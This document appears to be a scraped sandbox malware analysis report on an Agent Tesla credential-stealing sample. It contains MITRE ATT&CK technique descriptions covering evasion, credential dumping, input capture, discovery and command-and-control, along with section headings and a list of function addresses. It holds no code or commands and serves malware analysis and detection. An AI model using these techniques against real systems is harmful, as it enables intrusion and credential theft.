Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Function 017DD7F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Function 07B5D3A9 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 245
processCOMMON

Function 07B5D3B0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Function 017DB55F Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 200
COMMON

Function 017D590C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98
COMMON

Function 017D44E4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Function 07B5B902 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86
windowCOMMON

Function 07B5D120 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70
injectionCOMMON

Function 07B5D128 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
injectionCOMMON

Function 07B5CF88 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
threadCOMMON

Function 07B5D211 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre